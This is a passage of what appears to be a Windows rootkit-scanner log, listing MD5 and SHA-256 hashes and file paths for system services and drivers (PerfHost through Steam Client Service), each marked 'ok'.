21:27:07.0961 0x0ce4 [ FE52FF97A094609429FEF098EDC6FB08, 6762ED340048AF61B756CB7B576BE2057768FDB677623D01F2A592727C0E5A00 ] percsas2i C:\WINDOWS\system32\drivers\percsas2i.sys
21:27:07.0967 0x0ce4 percsas2i - ok
21:27:07.0970 0x0ce4 [ FCA143274792F12383C35902E801E83A, 87D93226E32153794993035553C9935D07242631E182460D8ED13650175C0F01 ] percsas3i C:\WINDOWS\system32\drivers\percsas3i.sys
21:27:07.0977 0x0ce4 percsas3i - ok
21:27:07.0988 0x0ce4 [ 4DAD2C73778D41F951B33854936E7BDC, 1421FDA2D083D5923422A038C54603BF798C48DDB7244DBEDA46D537B8CE1534 ] PerfHost C:\WINDOWS\SysWow64\perfhost.exe
21:27:07.0996 0x0ce4 PerfHost - ok
21:27:08.0016 0x0ce4 [ B730E963A31B73938A76D7B80666D60D, FADF452637E2EB50CC8C0E75956FE01F029C587F6EF2F8B347213263DE9D3A80 ] PhoneSvc C:\WINDOWS\System32\PhoneService.dll
21:27:08.0047 0x0ce4 PhoneSvc - ok
21:27:08.0053 0x0ce4 [ 97D85602B8131C487EB08A36F7343F5E, BEDC106AF06358D40BB034390645A5BFF9C138CFD51B5997D32614741D3D2372 ] PimIndexMaintenanceSvc C:\WINDOWS\System32\PimIndexMaintenance.dll
21:27:08.0064 0x0ce4 PimIndexMaintenanceSvc - ok
21:27:08.0088 0x0ce4 [ F9FB601621FF33376F3908C2C27C6EF4, 8689565D4FD1C68826EA0A9C2B44377A2AEC3CD812595F0D32904D8FA5809672 ] pla C:\WINDOWS\system32\pla.dll
21:27:08.0128 0x0ce4 pla - ok
21:27:08.0134 0x0ce4 [ A2BACEBAC01BE7A6656B454E75C23262, C2C168718A341D48679AC4CA8005BD06E9F1F0D1F7C72D3C30A7A8CE1F665A43 ] PlugPlay C:\WINDOWS\system32\umpnpmgr.dll
21:27:08.0153 0x0ce4 PlugPlay - ok
21:27:08.0161 0x0ce4 [ 414CA4DCC31D795882B25ADC1DACE779, AFD8D9AA24C64DD9569FDCBE65171810FE27AF24B8DD2941FECE6245EABB6AAC ] pmem C:\WINDOWS\System32\drivers\pmem.sys
21:27:08.0170 0x0ce4 pmem - ok
21:27:08.0173 0x0ce4 [ D54385DD5A39A5636D1587FC9ECFC337, DEEA5D433CB2DA55AE58C7C5431A1249C94B61606F0A75E4A44D516619060263 ] PNRPAutoReg C:\WINDOWS\system32\pnrpauto.dll
21:27:08.0181 0x0ce4 PNRPAutoReg - ok
21:27:08.0188 0x0ce4 [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] PNRPsvc C:\WINDOWS\system32\pnrpsvc.dll
21:27:08.0202 0x0ce4 PNRPsvc - ok
21:27:08.0211 0x0ce4 [ 118E91AEE8F6DDAD088F955498CF2487, F4447C64CF1F36432E0FF09B6712DCE61BF28E3499F20C6C69E80D98B42D671E ] PolicyAgent C:\WINDOWS\System32\ipsecsvc.dll
21:27:08.0229 0x0ce4 PolicyAgent - ok
21:27:08.0235 0x0ce4 [ 456DEA8B86DD28A2BAD65DC0F05B659E, CF23418563605C0255C903366D92F8A0C4CAA407000F509D558F676DD843DBCD ] Power C:\WINDOWS\system32\umpo.dll
21:27:08.0246 0x0ce4 Power - ok
21:27:08.0250 0x0ce4 [ D292D7FADCEE481CC64A9DE8FE9C3347, BD870A375E33CD8434CA97FFE9C2F84E58C6CD0EAEEEE8922172CB01F9674B55 ] PptpMiniport C:\WINDOWS\System32\drivers\raspptp.sys
21:27:08.0266 0x0ce4 PptpMiniport - ok
21:27:08.0306 0x0ce4 [ 5404E7A968A26DF03793B6F68536594D, BE5A85581E87EFE4DB43AD17B8D42D3F7F32364AEEC1416DBB94279C4A203FF2 ] PrintNotify C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll
21:27:08.0371 0x0ce4 PrintNotify - ok
21:27:08.0381 0x0ce4 [ D57CF871B3977731A91FE9611A54C7C1, B6C7F685716A88D0978377B83C5320C88EED0CAA44A001849AAFF71E4E0682E7 ] Processor C:\WINDOWS\System32\drivers\processr.sys
21:27:08.0391 0x0ce4 Processor - ok
21:27:08.0410 0x0ce4 [ 9ED60073731578E355E120327622C5DC, 863B4C7C0444E8EB212932739F68910F5E4C8F2677F0CB92381EBF6CB0AB7CC0 ] ProductAgentService C:\Program Files\Bitdefender Agent\ProductAgentService.exe
21:27:08.0431 0x0ce4 ProductAgentService - ok
21:27:08.0440 0x0ce4 [ 56A7713DE64B16FB309D132E88FDB098, A658C8DCA87442F33B726A9B2060B20393D83B8658D0894C046CAFEAB00E2D8A ] ProfSvc C:\WINDOWS\system32\profsvc.dll
21:27:08.0457 0x0ce4 ProfSvc - ok
21:27:08.0462 0x0ce4 [ B60431D2A046AD97F8427F6E568370F5, CD488E343585A5AC19D9AAF88BF0BB7EEA1BC48F6DA4A4FBF9BE5A04ECF5040B ] Psched C:\WINDOWS\system32\drivers\pacer.sys
21:27:08.0469 0x0ce4 Psched - ok
21:27:08.0474 0x0ce4 [ 80072EED0FDBC77E1F245B27995A40F2, E83B85B81A72CA67E4797017A0E44CF6074F49AD0BA1F0B7342C889CAA714B29 ] PSINAflt C:\WINDOWS\system32\DRIVERS\PSINAflt.sys
21:27:08.0481 0x0ce4 PSINAflt - ok
21:27:08.0485 0x0ce4 [ 19BEE6C83EF303FF186B2756BC6C7CB1, A48D0601C2516003DFBB55C6097A0C193B9D71F788876D34B71BAB7802B48FAE ] PSINFile C:\WINDOWS\system32\DRIVERS\PSINFile.sys
21:27:08.0491 0x0ce4 PSINFile - ok
21:27:08.0496 0x0ce4 [ 256A4A55910490B97DD4046428680CE9, 093A958E75DFA1A6FE5EFEE2FAEF867BD255958C92B389D6EDDD82D8AE185E62 ] PSINKNC C:\WINDOWS\system32\DRIVERS\PSINKNC.sys
21:27:08.0503 0x0ce4 PSINKNC - ok
21:27:08.0508 0x0ce4 [ 24E82387D730C4EAD43D1C3D0714F0E2, 06F1EB7529839C5375437DB2CD1840BA3F6227929A175E5058750B8BAC4A6626 ] PSINProc C:\WINDOWS\system32\DRIVERS\PSINProc.sys
21:27:08.0514 0x0ce4 PSINProc - ok
21:27:08.0518 0x0ce4 [ 7DF81D950D0A4A7D855B8C3A1BC96915, AC3F51F034E2EFDDE287AD912B01D63121873C3EBEE034E09C742247CCE25985 ] PSINProt C:\WINDOWS\system32\DRIVERS\PSINProt.sys
21:27:08.0525 0x0ce4 PSINProt - ok
21:27:08.0529 0x0ce4 [ A546D3C1C5B3B58FE46757F475F523D0, C8825E3E377BA0E78928250B3D8E2E1562F4F6E5BB05E6548E71DB197CEDD588 ] PSINReg C:\WINDOWS\system32\DRIVERS\PSINReg.sys
21:27:08.0535 0x0ce4 PSINReg - ok
21:27:08.0538 0x0ce4 [ F803473CD0E5D36D02EB58109F1294CD, DB6FFB4100BD35D491FF1C61FB3073049C2C18038D004A6D1E279A95AB8BA2EC ] PSKMAD C:\WINDOWS\system32\DRIVERS\PSKMAD.sys
21:27:08.0546 0x0ce4 PSKMAD - ok
21:27:08.0553 0x0ce4 [ E0DCCA2A78516D155A6485CCA99F0EA5, EAFD24F815ECD6373BEC8E75B24FB54694CB8E4FF430FB6886F9B5B1C1762BFC ] QWAVE C:\WINDOWS\system32\qwave.dll
21:27:08.0571 0x0ce4 QWAVE - ok
21:27:08.0574 0x0ce4 [ A2B0F46FBA2521E7E732BDBDB1238515, 7F0FEFB09770BF5889D6C2219F68399C962A3F1071E70C4951B6FDAE196CF041 ] QWAVEdrv C:\WINDOWS\system32\drivers\qwavedrv.sys
21:27:08.0588 0x0ce4 QWAVEdrv - ok
21:27:08.0591 0x0ce4 [ EA9EB06EFC325CD2ACF5DF2F26A4894E, 32AC7EDB42CDA736E2AD9AB67795735F16234D9BD80D56FDAE5B8B3C3C1CC26F ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
21:27:08.0598 0x0ce4 RasAcd - ok
21:27:08.0602 0x0ce4 [ 4E9379389D0A851DD19D130C8FAEFBD0, 279A25EF8949A5BAF311CA75493A5F89F74A02711EF875F67D0A95849B409C00 ] RasAgileVpn C:\WINDOWS\System32\drivers\AgileVpn.sys
21:27:08.0618 0x0ce4 RasAgileVpn - ok
21:27:08.0621 0x0ce4 [ 3E8CB44832FE3F96047187291523CDA1, 999A10D4D50CD2C39309FDC04A9F4CB0959BA061AE9305D4DF7F00F37F3813F9 ] RasAuto C:\WINDOWS\System32\rasauto.dll
21:27:08.0632 0x0ce4 RasAuto - ok
21:27:08.0636 0x0ce4 [ 5279EC98F6218D29EADDFECCC0D80E9A, 6F376FC3BEFA9F521635192177962AF1F41173502EC067896B7C2A5FB71E7A3B ] Rasl2tp C:\WINDOWS\System32\drivers\rasl2tp.sys
21:27:08.0651 0x0ce4 Rasl2tp - ok
21:27:08.0665 0x0ce4 [ AC6A0AE3B33EE783717820458882F91C, EA503A90DBC31FB6B5D047D59E0F2855880EF3877877AD576579DB5CD8188E4A ] RasMan C:\WINDOWS\System32\rasmans.dll
21:27:08.0697 0x0ce4 RasMan - ok
21:27:08.0701 0x0ce4 [ D7FF75ED7A48FD60A573C9E959CF4DB5, C67673E2D678527F8C07C9BCC487D385B92282D9D73396CFB01F14F5211CA991 ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
21:27:08.0710 0x0ce4 RasPppoe - ok
21:27:08.0713 0x0ce4 [ 6A4E45A7F17FA0B4B1B48C550E311944, 1E84A559B7AA5F07E8156D223EFFB1B2B43D1E4E90E561D8DF2C257FFBCFDC0D ] RasSstp C:\WINDOWS\System32\drivers\rassstp.sys
21:27:08.0729 0x0ce4 RasSstp - ok
21:27:08.0737 0x0ce4 [ F2C575A9657F7B2E027C6CE7BC8F1A2D, 5D002488CCEDCEBF0542F508FCE47DC9105C67D5685489970048437BD243AC0E ] rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
21:27:08.0749 0x0ce4 rdbss - ok
21:27:08.0753 0x0ce4 [ 9414B22E093243636D362BF8C8C12A67, 575CE91AFADD771CBF86377962EDFAF70150BBA575F8DF144FEE6CC1C0FF88E0 ] rdpbus C:\WINDOWS\System32\drivers\rdpbus.sys
21:27:08.0760 0x0ce4 rdpbus - ok
21:27:08.0765 0x0ce4 [ 53A01D3FDB701AC5D9DDE4140227E3D9, 833AF0BAAB49B58C71C684D2AA20B900C27E19DDCE5E15355C7ABAAB33BC7673 ] RDPDR C:\WINDOWS\system32\drivers\rdpdr.sys
21:27:08.0775 0x0ce4 RDPDR - ok
21:27:08.0780 0x0ce4 [ DF32ED51DC0C3F6F3B1C4CEF71B8B426, DBEAD271B5DE6439E3106BDDB8B1E47D7BA47AE203CF3E1F8924CE02FDCA6E0B ] RdpVideoMiniport C:\WINDOWS\system32\drivers\rdpvideominiport.sys
21:27:08.0786 0x0ce4 RdpVideoMiniport - ok
21:27:08.0792 0x0ce4 [ 2369A5B651308E0C3458143976E9B03B, 0EDE99F7E2A7668E90C2FCA11D4BCE0676FBEA2CCFB57A004827CE5FE96D1584 ] rdyboost C:\WINDOWS\system32\drivers\rdyboost.sys
21:27:08.0802 0x0ce4 rdyboost - ok
21:27:08.0828 0x0ce4 [ 3581FB9529035F8EC6DB681664CA70B1, 0C7BCD6A3B4248683C52B69F0B373D5929C2375F9BBF6CA80C480A8E7446A30C ] ReFS C:\WINDOWS\system32\drivers\ReFS.sys
21:27:08.0861 0x0ce4 ReFS - ok
21:27:08.0877 0x0ce4 [ 79E1ADE19D8B7C56EF29D098EAF57AD0, 295D0F04359A00849759976710F6CB83DB96E5007946930EA19865620EA3EFE7 ] ReFSv1 C:\WINDOWS\system32\drivers\ReFSv1.sys
21:27:08.0896 0x0ce4 ReFSv1 - ok
21:27:08.0907 0x0ce4 [ D91C597DE82E1500525945E1FFF24B0F, 3F5837A743715FB2CCBFC9458FBE010AED170B46515925D4C7C59BBAC792F695 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
21:27:08.0924 0x0ce4 RemoteAccess - ok
21:27:08.0929 0x0ce4 [ 19D1072193DAF71C97E5A05FC7673BB3, 313C3762CCC490C20B5561A78E6002E7A52F0142B370F17849DD4AB2F0AF6513 ] RemoteRegistry C:\WINDOWS\system32\regsvc.dll
21:27:08.0945 0x0ce4 RemoteRegistry - ok
21:27:08.0957 0x0ce4 [ A12D167F73C3E285AC623BCA62B3A8BC, 6E8213808C22C0688BD40721FBBBAA88BFEFA1BD304BC19AA015FC541CA5BF84 ] RetailDemo C:\WINDOWS\system32\RDXService.dll
21:27:08.0978 0x0ce4 RetailDemo - ok
21:27:08.0983 0x0ce4 [ 5F44B0167AA65BFFC778227725CB258C, 00027F82639C7E054CF42179A26B5D43FD789C943979EF3F29BC364319A2D306 ] RFCOMM C:\WINDOWS\System32\drivers\rfcomm.sys
21:27:08.0993 0x0ce4 RFCOMM - ok
21:27:08.0998 0x0ce4 [ D31B2CD9458D2E212A5F24D56D2FB8D5, D8EC0BDB9D143C050A48217C57AA1BA6D60EEFEF67A98441064BD8FD339987DD ] RmSvc C:\WINDOWS\System32\RMapi.dll
21:27:09.0015 0x0ce4 RmSvc - ok
21:27:09.0019 0x0ce4 [ C79F1F7C8A5FCBE90E3C833299AA1F59, 7969E79B2095BDA144AA369DE21F49C9FAD272B5864B2F0FD28CB28D148F2AD6 ] RpcEptMapper C:\WINDOWS\System32\RpcEpMap.dll
21:27:09.0028 0x0ce4 RpcEptMapper - ok
21:27:09.0031 0x0ce4 [ 1CE6928C1587F9760F7C3A036786CAE8, 3E4F5371E0DDDBA612BF61891D17D691DCAFB2E1010BBD84737FBD98DA8C03DE ] RpcLocator C:\WINDOWS\system32\locator.exe
21:27:09.0039 0x0ce4 RpcLocator - ok
21:27:09.0056 0x0ce4 [ 0E79A4C76CAAA0CFE9CA42C13E5AA086, C4D90EDA54216CC7897128D39517E4E18195BF28254796C6D0684E2C7DB90642 ] RpcSs C:\WINDOWS\system32\rpcss.dll
21:27:09.0085 0x0ce4 RpcSs - ok
21:27:09.0090 0x0ce4 [ E87EECED9287C275B6CF30EB598B1D77, D0C5D4E37A3FAD422C0ECFFAB53904D9FD5385129DE2BC5AF75D91CD016EA6AC ] rspndr C:\WINDOWS\system32\drivers\rspndr.sys
21:27:09.0104 0x0ce4 rspndr - ok
21:27:09.0118 0x0ce4 [ 3AB1AA5155684F40E2F5215A258D2471, 3D6A5F603FA6809651A006EA31F57920A45642B6B9E8EC80E5399D1301F635E4 ] RTL8168 C:\WINDOWS\System32\drivers\Rt630x64.sys
21:27:09.0133 0x0ce4 RTL8168 - ok
21:27:09.0136 0x0ce4 RtNdPt630 - ok
21:27:09.0138 0x0ce4 RTTEAMPT - ok
21:27:09.0140 0x0ce4 RTVLANPT - ok
21:27:09.0142 0x0ce4 [ 6308366D3CDEA5F427CFF4BCF0081B4E, ABB91A41C09A1607C66BD380FD0A3EECAAF9AD534856CCC78DE1A4E450ADB07F ] s3cap C:\WINDOWS\System32\drivers\vms3cap.sys
21:27:09.0149 0x0ce4 s3cap - ok
21:27:09.0152 0x0ce4 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] SamSs C:\WINDOWS\system32\lsass.exe
21:27:09.0159 0x0ce4 SamSs - ok
21:27:09.0163 0x0ce4 [ 33B2DC5C2F19DA89F862484E23D9833D, 1C3BD1804767D087BE1510EEDCE94FFAC096922C821A123DB1BACDA5777246A7 ] sbp2port C:\WINDOWS\system32\drivers\sbp2port.sys
21:27:09.0170 0x0ce4 sbp2port - ok
21:27:09.0175 0x0ce4 [ 6A7F961E0E6382F185809AEC6A97E078, 434E215337453C3973762A2F10806A57F3B296DDD34A948F781B67E374836AF5 ] SCardSvr C:\WINDOWS\System32\SCardSvr.dll
21:27:09.0189 0x0ce4 SCardSvr - ok
21:27:09.0194 0x0ce4 [ 45B203A8CD642F72E86690B957B6490D, 29D5733D2A6FF9F051FD74FFDCCDB5272EC8E7734021F5BBF0E9E521E61B150F ] ScDeviceEnum C:\WINDOWS\System32\ScDeviceEnum.dll
21:27:09.0207 0x0ce4 ScDeviceEnum - ok
21:27:09.0210 0x0ce4 [ 5CFEEFCC6FAD1FD09ACCFBD652DDD85B, F90104CC42073ACD48A2FCCEDF58B57D8663223406ECB0A270140A053E9260B3 ] scfilter C:\WINDOWS\system32\DRIVERS\scfilter.sys
21:27:09.0218 0x0ce4 scfilter - ok
21:27:09.0232 0x0ce4 [ 5BBFA6CA63E8A5BB8FA2FA84A5562CE2, C74CD0A76473343A8620D26C96F7300026C295EDF61B8A336AB326DFE861678D ] Schedule C:\WINDOWS\system32\schedsvc.dll
21:27:09.0263 0x0ce4 Schedule - ok
21:27:09.0268 0x0ce4 [ 5C8620FAC0E3C1658C8EF7AD7BB7EA5F, FEBE7FC79FCDF692167D82DE54031FD68BD2941544007EEB3D82C21E7F1C5C83 ] scmbus C:\WINDOWS\system32\drivers\scmbus.sys
21:27:09.0274 0x0ce4 scmbus - ok
21:27:09.0279 0x0ce4 [ 0EC94DA356D89CACD89B6E139E4D0A7D, 2F887681FDD5AB787154403E34623B1DFB61C70DAE5E2BFF1565E100F228870B ] SCPolicySvc C:\WINDOWS\System32\certprop.dll
21:27:09.0290 0x0ce4 SCPolicySvc - ok
21:27:09.0293 0x0ce4 [ AD7189E85A0801DE0507C610963A3CD0, 0AA9F3C9D252624CC62EC95FD910C6911E136DD3E66159CEB9857BC7AB70FAA2 ] ScpVBus C:\WINDOWS\System32\drivers\ScpVBus.sys
21:27:09.0298 0x0ce4 ScpVBus - ok
21:27:09.0304 0x0ce4 [ DCD86049661A2C36DEE69D9DF7C3330D, DFFE21D91289C17A1ACE1311A8621EDC0C6579552B4C22FEC3BD884746234114 ] sdbus C:\WINDOWS\System32\drivers\sdbus.sys
21:27:09.0314 0x0ce4 sdbus - ok
21:27:09.0317 0x0ce4 [ 464B615872981015AC4FEEBDEA83A063, 5CF491352B267241CA11F08E72E6EA668A595662561892E0D02CCA5B71172E14 ] SDFRd C:\WINDOWS\System32\drivers\SDFRd.sys
21:27:09.0323 0x0ce4 SDFRd - ok
21:27:09.0327 0x0ce4 [ 847F01FB8504425BB255856A14278A86, 41997D25D12779CA79551988C56FA0A302367076B09A82F620858EDDDBFCE3FF ] SDRSVC C:\WINDOWS\System32\SDRSVC.dll
21:27:09.0338 0x0ce4 SDRSVC - ok
21:27:09.0341 0x0ce4 [ 6BC219F1D9CDE08CEB9084ADB41FBA01, DA8AC3B42A72515A1976961976203A52D4C8636586EB5EF6B466AAF967A6567E ] sdstor C:\WINDOWS\System32\drivers\sdstor.sys
21:27:09.0348 0x0ce4 sdstor - ok
21:27:09.0351 0x0ce4 [ 2AE8505519C7E8A903DD7BE793A79846, 7044B1BC183E028BCFB544489B033F0968F033696F9816F354329ABD26C6EE7E ] seclogon C:\WINDOWS\system32\seclogon.dll
21:27:09.0364 0x0ce4 seclogon - ok
21:27:09.0372 0x0ce4 [ 09301074EA03CA8E82EAB16ADA1217CA, 4A303880959F611B199C810D231539B7DE618E28041BFA30891F2C55A70754D7 ] SecurityHealthService C:\WINDOWS\system32\SecurityHealthService.exe
21:27:09.0383 0x0ce4 SecurityHealthService - ok
21:27:09.0402 0x0ce4 [ 77FB9BE8EDDCC999D09F2B1A7878A2A9, 589774C006A339FCA9772C37C9103C73C8592E018553804B97F34E2A0069A3F7 ] SEMgrSvc C:\WINDOWS\system32\SEMgrSvc.dll
21:27:09.0433 0x0ce4 SEMgrSvc - ok
21:27:09.0437 0x0ce4 [ 25456AF499A0C9C4A93CFAC70BDE9CC2, 885C1A9C8BFA73D9C9C454759DF871237F7C0F28D879E98B4BE0D0113C549B09 ] SENS C:\WINDOWS\System32\sens.dll
21:27:09.0449 0x0ce4 SENS - ok
21:27:09.0451 0x0ce4 Sense - ok
21:27:09.0470 0x0ce4 [ 892C955E1081412942F64679E0DD7A5D, 6A28012270FA1FB3BB279102C67FA5296564630181C887E1EA6EA1F952A30C37 ] SensorDataService C:\WINDOWS\System32\SensorDataService.exe
21:27:09.0510 0x0ce4 SensorDataService - ok
21:27:09.0521 0x0ce4 [ 358008CBDE5603F3B56789C977661CE3, 2C81180B27B854F201A683D2C75677660CA54ADC685F86CD414537C60D51FB4A ] SensorService C:\WINDOWS\system32\SensorService.dll
21:27:09.0540 0x0ce4 SensorService - ok
21:27:09.0545 0x0ce4 [ 9B3744C26F206F9F90713D93A93C8B6E, D194F668D8BDDDB4356136CACF1FAD46E7566939C624029EF6E28D7A192B8EBF ] SensrSvc C:\WINDOWS\system32\sensrsvc.dll
21:27:09.0557 0x0ce4 SensrSvc - ok
21:27:09.0560 0x0ce4 [ 585329F62195A4B7AAD0A95F6EC89751, E7ADED97ACA8E8E06C368E24702C22D4C2B0B9495DEA24A2DC2A30782099BDCE ] SerCx C:\WINDOWS\system32\drivers\SerCx.sys
21:27:09.0567 0x0ce4 SerCx - ok
21:27:09.0571 0x0ce4 [ C8F4FDA8B3D039D7947344614FF5BFB2, 1A3B88EC59F2A820AFE4F3AC65F7149EAC68672D1F0D729CBB575694005A8911 ] SerCx2 C:\WINDOWS\system32\drivers\SerCx2.sys
21:27:09.0579 0x0ce4 SerCx2 - ok
21:27:09.0581 0x0ce4 [ E5B450E4E0DC1591254BF9CCF6C57B40, 958E7378D9BDE1F2EBE736D8D9912D56835A606AABDD042443A35CA37EC70F11 ] Serenum C:\WINDOWS\System32\drivers\serenum.sys
21:27:09.0588 0x0ce4 Serenum - ok
21:27:09.0592 0x0ce4 [ 628D8DD136F92316BFEB58FA005338B7, 0CDA673D31F40EBD07E9F67667DB6077F23DCADE2DD8376AB550575224625D44 ] Serial C:\WINDOWS\System32\drivers\serial.sys
21:27:09.0600 0x0ce4 Serial - ok
21:27:09.0603 0x0ce4 [ E5BA0B7353ADC5C95AB466D2E4DC89B1, 98F2A22ED892B2610C85EAAAB51DF25939599955A27611FCE9E68C3701CFD4EA ] sermouse C:\WINDOWS\System32\drivers\sermouse.sys
21:27:09.0610 0x0ce4 sermouse - ok
21:27:09.0620 0x0ce4 [ 043D7B39E693C610036BD56DF30EF440, 329D29CE1CB5F502B7DFCBE24878CA61EC56787A1B02195E19499701B194DE08 ] SessionEnv C:\WINDOWS\system32\sessenv.dll
21:27:09.0636 0x0ce4 SessionEnv - ok
21:27:09.0638 0x0ce4 [ 15CFCC4692DA8887B977CE5FC5181084, 31D86E122E35AB9E7275F2B0573EE98770BBE517ED3B9CCED97F4969C9A619F9 ] sfloppy C:\WINDOWS\System32\drivers\sfloppy.sys
21:27:09.0645 0x0ce4 sfloppy - ok
21:27:09.0655 0x0ce4 [ 87B083252816171A17F833CBCB7AA85E, 200AB93CEF384791DC9B04D2AF17877CA10595B2CEDF4B9505E367A2382C4AB7 ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
21:27:09.0679 0x0ce4 SharedAccess - ok
21:27:09.0691 0x0ce4 [ 4293E11951DEAAFB3924AB1DAB1FAC08, 644974816DDF690B26F369E48533D654A5B298BCA993EE53EACB5C00E52E5243 ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
21:27:09.0715 0x0ce4 ShellHWDetection - ok
21:27:09.0721 0x0ce4 [ 1F73E6C66E7D9ED4FD58F9238D27430E, F1BFF9D3A0BB1981F6A1A3C23476675760E5AEFD919697D6DF00421576D93985 ] shpamsvc C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll
21:27:09.0734 0x0ce4 shpamsvc - ok
21:27:09.0739 0x0ce4 [ 2339F6B45E1D863B1D327F3AFD75A675, 03304ADC42EF6E8F671C8AA78A0D3E40408D870FBF2DA2B31A1727F86EF8F213 ] SiSRaid2 C:\WINDOWS\system32\drivers\SiSRaid2.sys
21:27:09.0744 0x0ce4 SiSRaid2 - ok
21:27:09.0748 0x0ce4 [ F520D50AD7266ED31D25DF4C8EA6BC2D, F68CF9EFB8319E59A8D9C24A36A198185DD79CBACD14510F5450F0024F0CD4D3 ] SiSRaid4 C:\WINDOWS\system32\drivers\sisraid4.sys
21:27:09.0755 0x0ce4 SiSRaid4 - ok
21:27:09.0761 0x0ce4 [ 704B4F81729F676BBF034529FC334D82, 1E50DAF97836807A500284385D99272780A8B69CA88761250451060B207824F8 ] SkypeUpdate C:\Program Files (x86)\Skype\Updater\Updater.exe
21:27:09.0771 0x0ce4 SkypeUpdate - ok
21:27:09.0774 0x0ce4 [ 70A2FD5F5B7B1A5E1146BE45E4DFB75D, 598824F06BBC2E37B9A6474411637C73233C8D2E13AE963C3229279A8519A9D3 ] smphost C:\WINDOWS\System32\smphost.dll
21:27:09.0787 0x0ce4 smphost - ok
21:27:09.0797 0x0ce4 [ CB001810FD0C56F1D57229D023A84AE8, E423B53EE3A3710D6F45CD14C8BA5EF8E955344C8477385D470E6687FC661A75 ] SmsRouter C:\WINDOWS\system32\SmsRouterSvc.dll
21:27:09.0824 0x0ce4 SmsRouter - ok
21:27:09.0829 0x0ce4 [ 17B685A6DBD7543D2A55739526361583, EAF3C4DE587866D04CF9B051E5CEE335BC84788C8C62816AF404B6AD24FF1482 ] SNMPTRAP C:\WINDOWS\System32\snmptrap.exe
21:27:09.0838 0x0ce4 SNMPTRAP - ok
21:27:09.0848 0x0ce4 [ 2334ED0B61CAE7E7B1B454674206CDAC, 4EAA11805C2282E0306A381CF56E4B28D83C68BA1B401BFD512AE70C05C8A4CD ] spaceport C:\WINDOWS\system32\drivers\spaceport.sys
21:27:09.0863 0x0ce4 spaceport - ok
21:27:09.0867 0x0ce4 [ F3F0B8CAC1F3E6C3382EAFCE762475AD, 9F2EB373FB9216CDA71965979EE5E18F3AFDD26FF7E0C09DD7C3D880205C2554 ] SpatialGraphFilter C:\WINDOWS\system32\drivers\SpatialGraphFilter.sys
21:27:09.0873 0x0ce4 SpatialGraphFilter - ok
21:27:09.0876 0x0ce4 [ 83E82B0E292DCDE4C75B9241BF0FB300, 494D2FD4CD082CC416CA5FF1ABE06BDC65A769F371CF0E18AD25C380B45AEE32 ] SpbCx C:\WINDOWS\system32\drivers\SpbCx.sys
21:27:09.0882 0x0ce4 SpbCx - ok
21:27:09.0898 0x0ce4 [ 10CD42898C9E4849193E78A87337B2E9, 7C4FCB36EE1AF92C6962F14AE6DEF2CB154468EC3963DCDB9BDF8398C98B475B ] spectrum C:\WINDOWS\system32\spectrum.exe
21:27:09.0923 0x0ce4 spectrum - ok
21:27:09.0937 0x0ce4 [ 29D813B5D84BC2C26BBC607CAA57A675, 2C4D5F4E2F7B6580E22ABF67690B0D32CAF5063DEA79E6F57E565782973F3990 ] Spooler C:\WINDOWS\System32\spoolsv.exe
21:27:09.0961 0x0ce4 Spooler - ok
21:27:10.0021 0x0ce4 [ E910861720DE6EDFB5CC6158CE3C7E17, 526BA8EEB9EE5312FEC39753D728E05F49AD81132346A354C95D4D4938001E2B ] sppsvc C:\WINDOWS\system32\sppsvc.exe
21:27:10.0099 0x0ce4 sppsvc - ok
21:27:10.0111 0x0ce4 [ 36EAC4FE629FC036632F13EC14788FD1, 6AEE37816306FE46FA99EADB23E98CE6A6674C11ED847F1F5575926E26B09F9A ] srv C:\WINDOWS\system32\DRIVERS\srv.sys
21:27:10.0126 0x0ce4 srv - ok
21:27:10.0138 0x0ce4 [ A84B05C7C2A233497BE1D518A662C326, 85B291B6783AD48F2111B46050311A553BE6D6A7C3D90861DC010FA65730D2B5 ] srv2 C:\WINDOWS\system32\DRIVERS\srv2.sys
21:27:10.0160 0x0ce4 srv2 - ok
21:27:10.0166 0x0ce4 [ 0351B28EEDFBD6C8CC69A7224A098CFA, D1D08D63F773CAEEA66585D090C073C0748AE96A2AAE8487E4B8BA54F7E59558 ] srvnet C:\WINDOWS\system32\DRIVERS\srvnet.sys
21:27:10.0183 0x0ce4 srvnet - ok
21:27:10.0188 0x0ce4 [ E95A6C339AE68515897B2E4C6B0842CA, 29DD7E83CD68432EAE4A7ED92CDA40AA52028F5FBB52152F0A1C752B572C2684 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
21:27:10.0207 0x0ce4 SSDPSRV - ok
21:27:10.0213 0x0ce4 [ FBD45746B2EDEECA10CCA6A861F8049B, 34383B0A07A93E0FA89CA32CD45AC5061F73723B2A9E0BF4AF93A53F70F1678E ] SstpSvc C:\WINDOWS\system32\sstpsvc.dll
21:27:10.0225 0x0ce4 SstpSvc - ok
21:27:10.0230 0x0ce4 [ 592FF34A2FD6C6351B8A3AA76B2C0A9E, 152B7472DE531AC45492F562DD470B2CE33F1EEF13BC78F26046AE5ABF54E32F ] ssudmdm C:\WINDOWS\system32\DRIVERS\ssudmdm.sys
21:27:10.0237 0x0ce4 ssudmdm - ok
21:27:10.0250 0x0ce4 [ 7DB9E612A2742ACEAB080B882E83141C, FFD1FA36E732F55223F3F4B5F845331DBB3073B023C2C5BF51A0E7680DEE7FA7 ] ss_conn_service C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
21:27:10.0264 0x0ce4 ss_conn_service - ok
21:27:10.0337 0x0ce4 [ F1A5AC00B8CD7E28BBC8DD7E60D48B65, AC185DD46A8B63500DDE74C2446F6409B0B4612068C33B4B7C30E43F389908DF ] StateRepository C:\WINDOWS\system32\windows.staterepository.dll
21:27:10.0427 0x0ce4 StateRepository - ok
21:27:10.0454 0x0ce4 [ C8DC0C34715627ABF7A265ED27D1F75A, 5B8B9AC65D7458A8C6C868107E0BE3F9B1A1A5117FC69FDC260BAA9F1BDD0008 ] Steam Client Service C:\Program Files (x86)\Common Files\Steam\SteamService.exe
